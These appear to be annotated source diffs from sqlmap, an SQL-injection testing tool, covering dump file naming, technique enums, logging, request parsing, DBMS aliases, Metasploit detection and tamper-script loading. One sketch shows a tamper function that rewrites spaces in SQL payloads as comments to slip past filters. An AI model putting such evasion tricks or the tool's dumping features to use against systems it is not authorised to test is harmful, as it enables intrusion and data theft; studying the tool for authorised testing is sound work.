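FIREBIRD_PRIVS above maps the one-letter codes stored in Firebird's RDB$USER_PRIVILEGES table to readable privilege names. A hypothetical usage sketch with a trimmed copy of the mapping (duplicate letters from the diff are omitted here so the dictionary stays unambiguous):

    FIREBIRD_PRIVS = {
        "S": "SELECT",
        "I": "INSERT",
        "U": "UPDATE",
        "D": "DELETE",
        "R": "REFERENCE",
        "E": "EXECUTE",
        "A": "ALL",
        "M": "MEMBER",
        "B": "SUBSCRIBE",
    }

    def describe_privileges(letters):
        # e.g. "SIUD" -> ['SELECT', 'INSERT', 'UPDATE', 'DELETE']
        return [FIREBIRD_PRIVS.get(letter, "UNKNOWN (%s)" % letter) for letter in letters]

    print(describe_privileges("SIUD"))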
@@ -207,6 +216,7 @@ POST_HINT_CONTENT_TYPES = {
     POST_HINT.MULTIPART: "multipart/form-data",
     POST_HINT.SOAP: "application/soap+xml",
     POST_HINT.XML: "application/xml",
+    POST_HINT.ARRAY_LIKE: "application/x-www-form-urlencoded; charset=utf-8",
 }
 
 DEPRECATED_OPTIONS = {

@@ -214,6 +224,7 @@ DEPRECATED_OPTIONS = {
     "--no-unescape": "use '--no-escape' instead",
     "--binary": "use '--binary-fields' instead",
     "--check-payload": None,
+    "--check-waf": None,
 }
 
 DUMP_DATA_PREPROCESS = {
@@ -1,14 +1,15 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
 import cgi
-import codecs
+import hashlib
 import os
 import re
+import tempfile
 import threading
 
 from lib.core.common import Backend

@@ -21,6 +22,7 @@ from lib.core.common import openFile
 from lib.core.common import prioritySortColumns
 from lib.core.common import randomInt
 from lib.core.common import safeCSValue
+from lib.core.common import unicodeencode
 from lib.core.common import unsafeSQLIdentificatorNaming
 from lib.core.data import conf
 from lib.core.data import kb

@@ -32,12 +34,15 @@ from lib.core.enums import DBMS
 from lib.core.enums import DUMP_FORMAT
 from lib.core.exception import SqlmapGenericException
 from lib.core.exception import SqlmapValueException
+from lib.core.exception import SqlmapSystemException
 from lib.core.replication import Replication
 from lib.core.settings import HTML_DUMP_CSS_STYLE
+from lib.core.settings import IS_WIN
 from lib.core.settings import METADB_SUFFIX
 from lib.core.settings import MIN_BINARY_DISK_DUMP_SIZE
 from lib.core.settings import TRIM_STDOUT_DUMP_SIZE
 from lib.core.settings import UNICODE_ENCODING
+from lib.core.settings import WINDOWS_RESERVED_NAMES
 from thirdparty.magic import magic
 
 from extra.safe2bin.safe2bin import safechardecode
@@ -66,19 +71,30 @@ class Dump(object):
         if kb.get("multiThreadMode"):
             self._lock.acquire()
 
+        try:
             self._outputFP.write(text)
+        except IOError, ex:
+            errMsg = "error occurred while writing to log file ('%s')" % ex.message
+            raise SqlmapGenericException(errMsg)
 
         if kb.get("multiThreadMode"):
             self._lock.release()
 
         kb.dataOutputFlag = True
 
+    def flush(self):
+        if self._outputFP:
+            try:
+                self._outputFP.flush()
+            except IOError:
+                pass
+
     def setOutputFile(self):
         self._outputFile = os.path.join(conf.outputPath, "log")
         try:
-            self._outputFP = codecs.open(self._outputFile, "ab" if not conf.flushSession else "wb", UNICODE_ENCODING)
+            self._outputFP = openFile(self._outputFile, "ab" if not conf.flushSession else "wb")
         except IOError, ex:
-            errMsg = "error occurred while opening log file ('%s')" % ex
+            errMsg = "error occurred while opening log file ('%s')" % ex.message
             raise SqlmapGenericException(errMsg)
 
     def getOutputFile(self):
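The _write()/flush() changes above serialize writes behind a lock in multi-threaded runs and turn low-level IOErrors into a sqlmap-specific exception. A generic sketch of that pattern built only on the standard library (class and message wording are mine):

    import threading

    class SafeLogWriter(object):
        def __init__(self, path):
            self._lock = threading.Lock()
            self._fp = open(path, "ab")

        def write(self, text):
            with self._lock:   # serialize concurrent writers
                try:
                    self._fp.write(text.encode("utf-8"))
                except IOError as ex:   # e.g. disk full, revoked permissions
                    raise RuntimeError("error occurred while writing to log file ('%s')" % ex)

        def flush(self):
            try:
                self._fp.flush()
            except IOError:
                pass   # flushing is best effort

    writer = SafeLogWriter("session.log")
    writer.write("table dumped\n")
    writer.flush()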
@@ -367,6 +383,7 @@ class Dump(object):
         rtable = None
         dumpFP = None
         appendToFile = False
+        warnFile = False
 
         if tableValues is None:
             return

@@ -380,15 +397,45 @@ class Dump(object):
             self._write(tableValues, content_type=CONTENT_TYPE.DUMP_TABLE)
             return
 
-        dumpDbPath = os.path.join(conf.dumpPath, re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(db)))
+        _ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(db)))
+        if len(_) < len(db) or IS_WIN and db.upper() in WINDOWS_RESERVED_NAMES:
+            _ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(db)))
+            dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % (_, hashlib.md5(unicodeencode(db)).hexdigest()[:8]))
+            warnFile = True
+        else:
+            dumpDbPath = os.path.join(conf.dumpPath, _)
 
         if conf.dumpFormat == DUMP_FORMAT.SQLITE:
             replication = Replication(os.path.join(conf.dumpPath, "%s.sqlite3" % unsafeSQLIdentificatorNaming(db)))
         elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML):
             if not os.path.isdir(dumpDbPath):
+                try:
                     os.makedirs(dumpDbPath, 0755)
+                except (OSError, IOError), ex:
+                    try:
+                        tempDir = tempfile.mkdtemp(prefix="sqlmapdb")
+                    except IOError, _:
+                        errMsg = "unable to write to the temporary directory ('%s'). " % _
+                        errMsg += "Please make sure that your disk is not full and "
+                        errMsg += "that you have sufficient write permissions to "
+                        errMsg += "create temporary files and/or directories"
+                        raise SqlmapSystemException(errMsg)
+
+                    warnMsg = "unable to create dump directory "
+                    warnMsg += "'%s' (%s). " % (dumpDbPath, ex)
+                    warnMsg += "Using temporary directory '%s' instead" % tempDir
+                    logger.warn(warnMsg)
+
+                    dumpDbPath = tempDir
 
+            _ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(table)))
+            if len(_) < len(table) or IS_WIN and table.upper() in WINDOWS_RESERVED_NAMES:
+                _ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(table)))
+                dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(unicodeencode(table)).hexdigest()[:8], conf.dumpFormat.lower()))
+                warnFile = True
+            else:
+                dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower()))
+
-            dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower()))
             appendToFile = os.path.isfile(dumpFileName) and any((conf.limitStart, conf.limitStop))
             dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab")
 
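The block above sanitizes database and table names before using them as dump file names, and appends a short MD5 suffix whenever the sanitized name loses characters or collides with a Windows reserved name. A standalone sketch of the same naming scheme (the reserved-name list is abbreviated and the helper is mine):

    import hashlib
    import os
    import re
    import unicodedata

    WINDOWS_RESERVED_NAMES = ("CON", "PRN", "AUX", "NUL", "COM1", "LPT1")  # abbreviated

    def dump_filename(directory, table, extension="csv"):
        # fold to ASCII, then replace anything that is not a word character
        normalized = unicodedata.normalize("NFKD", table).encode("ascii", "ignore").decode("ascii")
        safe = re.sub(r"[^\w]", "_", normalized)
        if len(safe) < len(table) or table.upper() in WINDOWS_RESERVED_NAMES:
            # disambiguate lossy or reserved names with a short hash of the original
            safe = "%s-%s" % (safe, hashlib.md5(table.encode("utf-8")).hexdigest()[:8])
        return os.path.join(directory, "%s.%s" % (safe, extension))

    print(dump_filename("/tmp/dump", u"users"))   # .../users.csv
    print(dump_filename("/tmp/dump", u"CON"))     # reserved name gets a hash suffix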
@@ -574,7 +621,12 @@ class Dump(object):
                 else:
                     dataToDumpFile(dumpFP, "\n")
                 dumpFP.close()
-                logger.info("table '%s.%s' dumped to %s file '%s'" % (db, table, conf.dumpFormat, dumpFileName))
+
+                msg = "table '%s.%s' dumped to %s file '%s'" % (db, table, conf.dumpFormat, dumpFileName)
+                if not warnFile:
+                    logger.info(msg)
+                else:
+                    logger.warn(msg)
 
     def dbColumns(self, dbColumnsDict, colConsider, dbs):
         if hasattr(conf, "api"):
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

@@ -74,6 +74,7 @@ class POST_HINT:
     JSON_LIKE = "JSON-like"
     MULTIPART = "MULTIPART"
     XML = "XML (generic)"
+    ARRAY_LIKE = "Array-like"
 
 class HTTPMETHOD:
     GET = "GET"

@@ -165,6 +166,7 @@ class HTTP_HEADER:
     COOKIE = "Cookie"
     SET_COOKIE = "Set-Cookie"
     HOST = "Host"
+    LOCATION = "Location"
     PRAGMA = "Pragma"
     PROXY_AUTHORIZATION = "Proxy-Authorization"
     PROXY_CONNECTION = "Proxy-Connection"

@@ -206,10 +208,10 @@ class PAYLOAD:
     SQLINJECTION = {
         1: "boolean-based blind",
         2: "error-based",
-        3: "UNION query",
+        3: "inline query",
         4: "stacked queries",
         5: "AND/OR time-based blind",
-        6: "inline query",
+        6: "UNION query",
     }
 
     PARAMETER = {

@@ -248,10 +250,10 @@ class PAYLOAD:
     class TECHNIQUE:
         BOOLEAN = 1
         ERROR = 2
-        UNION = 3
+        QUERY = 3
         STACKED = 4
         TIME = 5
-        QUERY = 6
+        UNION = 6
 
     class WHERE:
         ORIGINAL = 1
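The two hunks above renumber the technique constants (inline query becomes 3, UNION becomes 6) and update the SQLINJECTION label dictionary to match. A tiny sketch of why the two structures must stay in sync (constants reproduced from the diff, helper name is mine):

    class TECHNIQUE:
        BOOLEAN = 1
        ERROR = 2
        QUERY = 3
        STACKED = 4
        TIME = 5
        UNION = 6

    SQLINJECTION = {
        1: "boolean-based blind",
        2: "error-based",
        3: "inline query",
        4: "stacked queries",
        5: "AND/OR time-based blind",
        6: "UNION query",
    }

    def technique_label(technique):
        # a stale mapping would silently report the wrong technique name
        return SQLINJECTION[technique]

    print(technique_label(TECHNIQUE.UNION))   # UNION query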
@@ -338,3 +340,8 @@ class AUTH_TYPE:
     DIGEST = "digest"
     NTLM = "ntlm"
     PKI = "pki"
+
+class AUTOCOMPLETE_TYPE:
+    SQL = 0
+    OS = 1
+    SQLMAP = 2
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

@@ -23,6 +23,9 @@ class SqlmapFilePathException(SqlmapBaseException):
 class SqlmapGenericException(SqlmapBaseException):
     pass
 
+class SqlmapInstallationException(SqlmapBaseException):
+    pass
+
 class SqlmapMissingDependence(SqlmapBaseException):
     pass
 

@@ -44,12 +47,21 @@ class SqlmapSilentQuitException(SqlmapBaseException):
 class SqlmapUserQuitException(SqlmapBaseException):
     pass
 
+class SqlmapShellQuitException(SqlmapBaseException):
+    pass
+
 class SqlmapSyntaxException(SqlmapBaseException):
     pass
 
+class SqlmapSystemException(SqlmapBaseException):
+    pass
+
 class SqlmapThreadException(SqlmapBaseException):
     pass
 
+class SqlmapTokenException(SqlmapBaseException):
+    pass
+
 class SqlmapUndefinedMethod(SqlmapBaseException):
     pass
 
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

@@ -41,4 +41,4 @@ FORMATTER = logging.Formatter("\r[%(asctime)s] [%(levelname)s] %(message)s", "%H
 
 LOGGER_HANDLER.setFormatter(FORMATTER)
 LOGGER.addHandler(LOGGER_HANDLER)
-LOGGER.setLevel(logging.WARN)
+LOGGER.setLevel(logging.INFO)
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

@@ -9,12 +9,14 @@ import cookielib
 import glob
 import inspect
 import logging
+import httplib
 import os
 import random
 import re
 import socket
 import string
 import sys
+import tempfile
 import threading
 import time
 import urllib2

@@ -51,7 +53,7 @@ from lib.core.common import readCachedFileContent
 from lib.core.common import readInput
 from lib.core.common import resetCookieJar
 from lib.core.common import runningAsAdmin
-from lib.core.common import sanitizeStr
+from lib.core.common import safeExpandUser
 from lib.core.common import setOptimize
 from lib.core.common import setPaths
 from lib.core.common import singleTimeWarnMessage
@@ -84,47 +86,41 @@ from lib.core.enums import WIZARD
 from lib.core.exception import SqlmapConnectionException
 from lib.core.exception import SqlmapFilePathException
 from lib.core.exception import SqlmapGenericException
+from lib.core.exception import SqlmapInstallationException
 from lib.core.exception import SqlmapMissingDependence
 from lib.core.exception import SqlmapMissingMandatoryOptionException
 from lib.core.exception import SqlmapMissingPrivileges
 from lib.core.exception import SqlmapSilentQuitException
 from lib.core.exception import SqlmapSyntaxException
+from lib.core.exception import SqlmapSystemException
 from lib.core.exception import SqlmapUnsupportedDBMSException
 from lib.core.exception import SqlmapUserQuitException
 from lib.core.log import FORMATTER
 from lib.core.optiondict import optDict
-from lib.core.settings import ACCESS_ALIASES
 from lib.core.settings import BURP_REQUEST_REGEX
 from lib.core.settings import BURP_XML_HISTORY_REGEX
 from lib.core.settings import CODECS_LIST_PAGE
 from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS
 from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
-from lib.core.settings import DB2_ALIASES
+from lib.core.settings import DBMS_ALIASES
 from lib.core.settings import DEFAULT_PAGE_ENCODING
 from lib.core.settings import DEFAULT_TOR_HTTP_PORTS
 from lib.core.settings import DEFAULT_TOR_SOCKS_PORT
 from lib.core.settings import DUMMY_URL
-from lib.core.settings import FIREBIRD_ALIASES
 from lib.core.settings import INJECT_HERE_MARK
 from lib.core.settings import IS_WIN
 from lib.core.settings import KB_CHARS_BOUNDARY_CHAR
+from lib.core.settings import KB_CHARS_LOW_FREQUENCY_ALPHABET
 from lib.core.settings import LOCALHOST
-from lib.core.settings import MAXDB_ALIASES
 from lib.core.settings import MAX_CONNECT_RETRIES
 from lib.core.settings import MAX_NUMBER_OF_THREADS
-from lib.core.settings import MSSQL_ALIASES
-from lib.core.settings import MYSQL_ALIASES
 from lib.core.settings import NULL
-from lib.core.settings import ORACLE_ALIASES
 from lib.core.settings import PARAMETER_SPLITTING_REGEX
-from lib.core.settings import PGSQL_ALIASES
 from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS
 from lib.core.settings import SITE
-from lib.core.settings import SQLITE_ALIASES
 from lib.core.settings import SQLMAP_ENVIRONMENT_PREFIX
 from lib.core.settings import SUPPORTED_DBMS
 from lib.core.settings import SUPPORTED_OS
-from lib.core.settings import SYBASE_ALIASES
 from lib.core.settings import TIME_DELAY_CANDIDATES
 from lib.core.settings import UNION_CHAR_REGEX
 from lib.core.settings import UNKNOWN_DBMS_VERSION
@@ -134,6 +130,7 @@ from lib.core.settings import WEBSCARAB_SPLITTER
 from lib.core.threads import getCurrentThreadData
 from lib.core.update import update
 from lib.parse.configfile import configFileParser
+from lib.parse.payloads import loadBoundaries
 from lib.parse.payloads import loadPayloads
 from lib.parse.sitemap import parseSitemap
 from lib.request.basic import checkCharEncoding

@@ -228,7 +225,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
 
             if not(conf.scope and not re.search(conf.scope, url, re.I)):
                 if not kb.targets or url not in addedTargetUrls:
-                    kb.targets.add((url, method, None, cookie))
+                    kb.targets.add((url, method, None, cookie, None))
                     addedTargetUrls.add(url)
 
     def _parseBurpLog(content):

@@ -242,7 +239,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
         for match in re.finditer(BURP_XML_HISTORY_REGEX, content, re.I | re.S):
             port, request = match.groups()
             request = request.decode("base64")
-            _ = re.search(r"%s:.+" % HTTP_HEADER.HOST, request)
+            _ = re.search(r"%s:.+" % re.escape(HTTP_HEADER.HOST), request)
             if _:
                 host = _.group(0).strip()
                 if not re.search(r":\d+\Z", host):

@@ -280,6 +277,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
         params = False
         newline = None
         lines = request.split('\n')
+        headers = []
 
         for index in xrange(len(lines)):
             line = lines[index]

@@ -291,7 +289,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
             line = line.strip('\r')
             match = re.search(r"\A(%s) (.+) HTTP/[\d.]+\Z" % "|".join(getPublicTypeMembers(HTTPMETHOD, True)), line) if not method else None
 
-            if len(line) == 0 and method in (HTTPMETHOD.POST, HTTPMETHOD.PUT) and data is None:
+            if len(line.strip()) == 0 and method and method != HTTPMETHOD.GET and data is None:
                 data = ""
                 params = True
 

@@ -329,14 +327,14 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
                     port = filterStringValue(splitValue[1], "[0-9]")
 
                 # Avoid to add a static content length header to
-                # conf.httpHeaders and consider the following lines as
+                # headers and consider the following lines as
                 # POSTed data
                 if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper():
                     params = True
 
                 # Avoid proxy and connection type related headers
                 elif key not in (HTTP_HEADER.PROXY_CONNECTION, HTTP_HEADER.CONNECTION):
-                    conf.httpHeaders.append((getUnicode(key), getUnicode(value)))
+                    headers.append((getUnicode(key), getUnicode(value)))
 
                 if CUSTOM_INJECTION_MARK_CHAR in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or ""):
                     params = True

@@ -364,12 +362,17 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
 
         if not(conf.scope and not re.search(conf.scope, url, re.I)):
             if not kb.targets or url not in addedTargetUrls:
-                kb.targets.add((url, method, data, cookie))
+                kb.targets.add((url, method, data, cookie, tuple(headers)))
                 addedTargetUrls.add(url)
 
-    fp = openFile(reqFile, "rb")
-    content = fp.read()
+    checkFile(reqFile)
+    try:
+        with openFile(reqFile, "rb") as f:
+            content = f.read()
+    except (IOError, OSError, MemoryError), ex:
+        errMsg = "something went wrong while trying "
+        errMsg += "to read the content of file '%s' ('%s')" % (reqFile, ex)
+        raise SqlmapSystemException(errMsg)
 
     if conf.scope:
         logger.info("using regular expression '%s' for filtering targets" % conf.scope)
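The request-file handling above moves to a context manager and wraps read failures in a single dedicated exception instead of letting IOError, OSError or MemoryError escape. A generic version of the same pattern (function name and exception type are mine):

    def read_binary_file(path):
        try:
            with open(path, "rb") as fp:
                return fp.read()
        except (IOError, OSError, MemoryError) as ex:
            # surface one predictable error type to the caller
            raise RuntimeError("something went wrong while trying to read "
                               "the content of file '%s' ('%s')" % (path, ex))

    print(len(read_binary_file(__file__)))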
@@ -409,7 +412,13 @@ def _loadQueries():
         return retVal
 
     tree = ElementTree()
+    try:
         tree.parse(paths.QUERIES_XML)
+    except Exception, ex:
+        errMsg = "something seems to be wrong with "
+        errMsg += "the file '%s' ('%s'). Please make " % (paths.QUERIES_XML, ex)
+        errMsg += "sure that you haven't made any changes to it"
+        raise SqlmapInstallationException, errMsg
 
     for node in tree.findall("*"):
         queries[node.attrib['value']] = iterate(node)

@@ -469,11 +478,12 @@ def _adjustLoggingFormatter():
         return
 
     def format(record):
-        _ = boldifyMessage(FORMATTER._format(record))
-        if kb.prependFlag:
-            _ = "\n%s" % _
+        message = FORMATTER._format(record)
+        message = boldifyMessage(message)
+        if kb.get("prependFlag"):
+            message = "\n%s" % message
             kb.prependFlag = False
-        return _
+        return message
 
     FORMATTER._format = FORMATTER.format
     FORMATTER.format = format
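The _adjustLoggingFormatter() change above keeps a reference to the original Formatter.format and wraps it so a newline can be prepended after an interactive prompt. A minimal standalone version of that wrapping trick (the flag dictionary is mine):

    import logging

    FORMATTER = logging.Formatter("[%(levelname)s] %(message)s")
    state = {"prepend": True}

    def _wrapped_format(record):
        message = FORMATTER._original_format(record)
        if state["prepend"]:
            message = "\n%s" % message
            state["prepend"] = False
        return message

    FORMATTER._original_format = FORMATTER.format   # keep the original bound method
    FORMATTER.format = _wrapped_format              # patch the instance, not the class

    handler = logging.StreamHandler()
    handler.setFormatter(FORMATTER)
    logger = logging.getLogger("demo")
    logger.addHandler(handler)
    logger.setLevel(logging.INFO)
    logger.info("first message gets a leading newline")
    logger.info("subsequent messages do not")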
@@ -489,7 +499,7 @@ def _setRequestFromFile():
 
     addedTargetUrls = set()
 
-    conf.requestFile = os.path.expanduser(conf.requestFile)
+    conf.requestFile = safeExpandUser(conf.requestFile)
 
     infoMsg = "parsing HTTP request from '%s'" % conf.requestFile
     logger.info(infoMsg)

@@ -569,14 +579,14 @@ def _setGoogleDorking():
         for link in links:
             link = urldecode(link)
             if re.search(r"(.*?)\?(.+)", link):
-                kb.targets.add((link, conf.method, conf.data, conf.cookie))
+                kb.targets.add((link, conf.method, conf.data, conf.cookie, None))
             elif re.search(URI_INJECTABLE_REGEX, link, re.I):
                 if kb.data.onlyGETs is None and conf.data is None and not conf.googleDork:
                     message = "do you want to scan only results containing GET parameters? [Y/n] "
                     test = readInput(message, default="Y")
                     kb.data.onlyGETs = test.lower() != 'n'
                 if not kb.data.onlyGETs or conf.googleDork:
-                    kb.targets.add((link, conf.method, conf.data, conf.cookie))
+                    kb.targets.add((link, conf.method, conf.data, conf.cookie, None))
 
         return links
 

@@ -612,7 +622,7 @@ def _setBulkMultipleTargets():
     if not conf.bulkFile:
         return
 
-    conf.bulkFile = os.path.expanduser(conf.bulkFile)
+    conf.bulkFile = safeExpandUser(conf.bulkFile)
 
     infoMsg = "parsing multiple targets list from '%s'" % conf.bulkFile
     logger.info(infoMsg)

@@ -626,7 +636,7 @@ def _setBulkMultipleTargets():
     for line in getFileItems(conf.bulkFile):
         if re.match(r"[^ ]+\?(.+)", line, re.I) or CUSTOM_INJECTION_MARK_CHAR in line:
             found = True
-            kb.targets.add((line.strip(), None, None, None))
+            kb.targets.add((line.strip(), None, None, None, None))
 
     if not found and not conf.forms and not conf.crawlDepth:
         warnMsg = "no usable links found (with GET parameters)"

@@ -643,7 +653,7 @@ def _setSitemapTargets():
     for item in parseSitemap(conf.sitemapUrl):
         if re.match(r"[^ ]+\?(.+)", item, re.I):
             found = True
-            kb.targets.add((item.strip(), None, None, None))
+            kb.targets.add((item.strip(), None, None, None, None))
 
     if not found and not conf.forms and not conf.crawlDepth:
         warnMsg = "no usable links found (with GET parameters)"
@@ -756,8 +766,14 @@ def _setMetasploit():
 
     if conf.msfPath:
         for path in (conf.msfPath, os.path.join(conf.msfPath, "bin")):
-            if all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("", "msfcli", "msfconsole", "msfencode", "msfpayload")):
+            if any(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfcli", "msfconsole")):
                 msfEnvPathExists = True
+                if all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfvenom",)):
+                    kb.oldMsf = False
+                elif all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfencode", "msfpayload")):
+                    kb.oldMsf = True
+                else:
+                    msfEnvPathExists = False
                 conf.msfPath = path
                 break
 

@@ -788,12 +804,20 @@ def _setMetasploit():
         for envPath in envPaths:
             envPath = envPath.replace(";", "")
 
-            if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("", "msfcli", "msfconsole", "msfencode", "msfpayload")):
+            if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("", "msfcli", "msfconsole")):
+                msfEnvPathExists = True
+                if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfvenom",)):
+                    kb.oldMsf = False
+                elif all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfencode", "msfpayload")):
+                    kb.oldMsf = True
+                else:
+                    msfEnvPathExists = False
+
+            if msfEnvPathExists:
                 infoMsg = "Metasploit Framework has been found "
                 infoMsg += "installed in the '%s' path" % envPath
                 logger.info(infoMsg)
 
-                msfEnvPathExists = True
                 conf.msfPath = envPath
 
                 break
@@ -885,16 +909,14 @@ def _setDBMS():
 
     if conf.dbms not in SUPPORTED_DBMS:
         errMsg = "you provided an unsupported back-end database management "
-        errMsg += "system. The supported DBMS are %s. " % ', '.join([_ for _ in DBMS_DICT])
+        errMsg += "system. Supported DBMSes are as follows: %s. " % ', '.join(sorted(_ for _ in DBMS_DICT))
         errMsg += "If you do not know the back-end DBMS, do not provide "
         errMsg += "it and sqlmap will fingerprint it for you."
         raise SqlmapUnsupportedDBMSException(errMsg)
 
-    for aliases in (MSSQL_ALIASES, MYSQL_ALIASES, PGSQL_ALIASES, ORACLE_ALIASES, \
-                    SQLITE_ALIASES, ACCESS_ALIASES, FIREBIRD_ALIASES, \
-                    MAXDB_ALIASES, SYBASE_ALIASES, DB2_ALIASES):
+    for dbms, aliases in DBMS_ALIASES:
         if conf.dbms in aliases:
-            conf.dbms = aliases[0]
+            conf.dbms = dbms
 
             break
 
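The _setDBMS() rewrite above replaces ten separate *_ALIASES imports with one DBMS_ALIASES sequence of (name, aliases) pairs. A simplified sketch of that lookup; the alias data below is a small illustrative subset, not sqlmap's full table:

    DBMS_ALIASES = (
        ("MySQL", ("mysql", "mariadb")),
        ("PostgreSQL", ("postgresql", "postgres", "pgsql")),
        ("Microsoft SQL Server", ("mssql", "sqlserver")),
    )

    def canonical_dbms(name):
        lowered = name.lower()
        for dbms, aliases in DBMS_ALIASES:
            if lowered == dbms.lower() or lowered in aliases:
                return dbms
        raise ValueError("unsupported DBMS '%s'" % name)

    print(canonical_dbms("postgres"))   # PostgreSQL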
@@ -944,13 +966,13 @@ def _setTamperingFunctions():
 
             try:
                 module = __import__(filename[:-3])
-            except ImportError, msg:
+            except (ImportError, SyntaxError), msg:
                 raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], msg))
 
             priority = PRIORITY.NORMAL if not hasattr(module, '__priority__') else module.__priority__
 
             for name, function in inspect.getmembers(module, inspect.isfunction):
-                if name == "tamper":
+                if name == "tamper" and inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs":
                     found = True
                     kb.tamperFunctions.append(function)
                     function.func_name = module.__name__

@@ -982,6 +1004,11 @@ def _setTamperingFunctions():
                 errMsg += "in tamper script '%s'" % tfile
                 raise SqlmapGenericException(errMsg)
 
+    if kb.tamperFunctions and len(kb.tamperFunctions) > 3:
+        warnMsg = "using too many tamper scripts is usually not "
+        warnMsg += "a good idea"
+        logger.warning(warnMsg)
+
     if resolve_priorities and priorities:
         priorities.sort(reverse=True)
         kb.tamperFunctions = []
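The stricter check above only registers a tamper() function that takes positional arguments plus **kwargs, so older single-argument scripts are skipped. A bare-bones script that satisfies the new signature (the priority value and the transformation are placeholders, not an official template):

    #!/usr/bin/env python

    __priority__ = 1   # placeholder; sqlmap's own scripts use PRIORITY constants

    def dependencies():
        pass

    def tamper(payload, **kwargs):
        # example transformation: replace spaces with inline comments
        return payload.replace(" ", "/**/") if payload else payload

    if __name__ == "__main__":
        print(tamper("SELECT id FROM users WHERE id=1"))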
@@ -1009,13 +1036,15 @@ def _setWafFunctions():
             sys.path.insert(0, dirname)
 
             try:
+                if filename[:-3] in sys.modules:
+                    del sys.modules[filename[:-3]]
                 module = __import__(filename[:-3])
             except ImportError, msg:
                 raise SqlmapSyntaxException("cannot import WAF script '%s' (%s)" % (filename[:-3], msg))
 
             _ = dict(inspect.getmembers(module))
             if "detect" not in _:
-                errMsg = "missing function 'detect(page, headers, code)' "
+                errMsg = "missing function 'detect(get_page)' "
                 errMsg += "in WAF script '%s'" % found
                 raise SqlmapGenericException(errMsg)
             else:

@@ -1068,7 +1097,12 @@ def _setHTTPProxy():
     debugMsg = "setting the HTTP/SOCKS proxy for all HTTP requests"
     logger.debug(debugMsg)
 
+    try:
         _ = urlparse.urlsplit(conf.proxy)
+    except Exception, ex:
+        errMsg = "invalid proxy address '%s' ('%s')" % (conf.proxy, ex)
+        raise SqlmapSyntaxException, errMsg
+
     hostnamePort = _.netloc.split(":")
 
     scheme = _.scheme.upper()
@@ -1116,21 +1150,63 @@ def _setHTTPProxy():
 
     proxyHandler.__init__(proxyHandler.proxies)
 
-def _setSafeUrl():
+def _setSafeVisit():
     """
-    Check and set the safe URL options.
+    Check and set the safe visit options.
     """
-    if not conf.safUrl:
+    if not any ((conf.safeUrl, conf.safeReqFile)):
         return
 
-    if not re.search("^http[s]*://", conf.safUrl):
-        if ":443/" in conf.safUrl:
-            conf.safUrl = "https://" + conf.safUrl
-        else:
-            conf.safUrl = "http://" + conf.safUrl
-
-    if conf.saFreq <= 0:
-        errMsg = "please provide a valid value (>0) for safe frequency (--safe-freq) while using safe URL feature"
+    if conf.safeReqFile:
+        checkFile(conf.safeReqFile)
+
+        raw = readCachedFileContent(conf.safeReqFile)
+        match = re.search(r"\A([A-Z]+) ([^ ]+) HTTP/[0-9.]+\Z", raw[:raw.find('\n')])
+
+        if match:
+            kb.safeReq.method = match.group(1)
+            kb.safeReq.url = match.group(2)
+            kb.safeReq.headers = {}
+
+            for line in raw[raw.find('\n') + 1:].split('\n'):
+                line = line.strip()
+                if line and ':' in line:
+                    key, value = line.split(':', 1)
+                    value = value.strip()
+                    kb.safeReq.headers[key] = value
+                    if key == HTTP_HEADER.HOST:
+                        if not value.startswith("http"):
+                            scheme = "http"
+                            if value.endswith(":443"):
+                                scheme = "https"
